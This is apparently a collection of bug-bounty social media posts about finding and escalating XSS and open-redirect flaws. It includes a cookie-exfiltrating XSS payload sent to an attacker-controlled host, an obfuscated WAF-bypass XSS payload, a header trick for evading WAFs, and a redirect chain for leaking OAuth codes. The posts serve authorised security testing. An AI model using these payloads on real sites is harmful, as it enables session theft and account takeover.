Is there a tool that will make finding DOM XSS & Prototype Pollution significantly easier?!
By the end of today's video, we're sure you'll be using Dom Invader in your future web app pentest or bug bounty target!
https://t.co/MLsXj6ue5a
Has anyone seen an XSS filter replacing dashes with commas? Seemingly restricted to dashes as all other special characters are reflected literally. It's a 3rd party end point creating ads.
IE http-equiv becomes http,equiv.
#XSS#bugbountytip#Pentesting#CyberSecurity
Beef up the severity of a pentest or bug bounty report by demonstrating real security impact.
I've put together a list of my favourite weaponised XSS payloads to help you turn alert(1) into P1.
Link in thread 🧵👇
Universal MXSS. Works in all browsers and is likely to bypass lots of filters because title is both an SVG and HTML tag. Briefly checked DOM Purify and it looked okay.
🔐💰 Question of the day: "How to Maximize Payouts with XSS Vulnerabilities"🤑Learn from my past mistakes! In my early days, I reported over 50 XSS issues, but I missed out on maximizing their impact, resulting in bounties that were only a fraction of what I could have earned.
Bounties for 'High' severity XSS Issues can range from $1,000 to $20,000. 💸
Here's a strategy to escalate XSS Vulnerabilities and boost your payouts:
1️⃣Always aim to turn XSS Vulnerabilities into account takeovers. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://attackersite(.)com?cookies=' + document.cookie + ''">
This payload exfiltrates user cookies and forwards them to an attacker-controlled site. Create a Proof of Concept (PoC) video showing how these cookies can hijack a user's session e.g. send a request to any authenticated API and demonstrate that the cookies work. This will earn you a 'High' severity bounty.
2️⃣If cookies are set as HTTPOnly, don't worry. Elevate the impact by performing sensitive client-side actions, such as changing a user's email address or password, and escalate it to an account takeover.
3️⃣If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these and escalate to an account takeover.
4️⃣If no session cookies or tokens are found on any pages, examine the browser's local storage for stored session tokens and exfiltrate them to escalate to an account takeover.
5️⃣ If none of the above methods work, stay tuned for more tips! 😄
🚀Common mistakes to avoid: Reporting XSS as simple "Medium" risk issues without maximizing their impact. Don't underestimate their potential. Always seek ways to escalate XSS Issues to account takeovers for substantial bounties! 💡 #BugBounty #InfoSec #xss #crosssitescripting #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips #QuestionOfTheDay
Next time you find an XSS, try to hijack the site’s permissions. Some sites require certain permissions, such as mic and camera, for legitimate purposes. If you find such a site, chances are that users already have these permissions enabled (1/2)
🕵️♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far!
Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program.
WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
🔐💰 Question of the day: How can you maximize payouts for "Low" risk open redirect issues? 🤑 I've personally earned over $30,000 in bounties by chaining open redirect submissions to ATOs. These "Low" severity bugs can often be escalated through a double redirection, resulting in bounties ranging from $750 to $5000, depending on the program.
Open redirects can be chained with legitimate redirects, allowing attackers to exfiltrate OAuth codes and tokens for potential account takeovers.
Here's the quick breakdown:
(1) Find a low-severity open redirect, for example: https://t.co/ktP26lD0uy.
(2) Look for site login functionality on core domains or subdomains. Assuming login is integrated with Auth0 or another equivalent service provider at https://t.co/09lMSKVy6y. In such cases, a valid redirect would usually look something like https://t.co/z33ygQDMLs
(3) You can now chain the vulnerable open redirect identified in step 1 with the login page and still be able to exfiltrate the login code in most cases. For example, you could craft a URI like https://t.co/dVC2YXpZZH
When a victim navigates to the above link and logs in, upon successful login, it will redirect them in this flow to the attacker controlled site:
https://t.co/7aqoiTOvLg -> (First Redirect) https://t.co/ZATutra0x2: -> (Second Redirect) https://t.co/1TkepNy8T6:
As a result, this ultimately leads to the leakage of Auth0 or other equivalent codes/tokens to an attacker-controlled server, resulting in an ATO.
Common mistakes: Reporting open redirects as simple issues without escalating their impact. Don't underestimate their potential. Always look for ways to level up! 💡 #BugBounty #InfoSec #openredirect #cybersecurity #bugbountytips #hackerone #bugcrowd,#securitytips,#questionoftheday
After seeing the tweet below from @ctbbpodcast and taking inspiration from the example from @joaxcar, here is a bookmark that will show most variations of hidden and disabled fields clearer, in a similar way to Burp. Just add this as the URL of a browser bookmark and click 🤘
Bypass Reflect XSS working on ASPNET Generic Microsoft WAF (detected by AFW00F)
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(`VulneravelXSS`%26%2300000000000000000041//
#bugbountytip#bugbounty#bugbountytips#xss
XSS Day #62
Today during recon, I found a Reflected XSS and a self stored XSS within the same site. The reflected XSS occurs in what seems to be Vue {{alert()}}. I'm trying to chain the reflected to the stored by manipulating the Vue template to set the localStorage value. Not much luck yet, hopefully more tomorrow!
#cybersecuritytips #XSS #bugbountytips #Pentesting #BugBountyXSS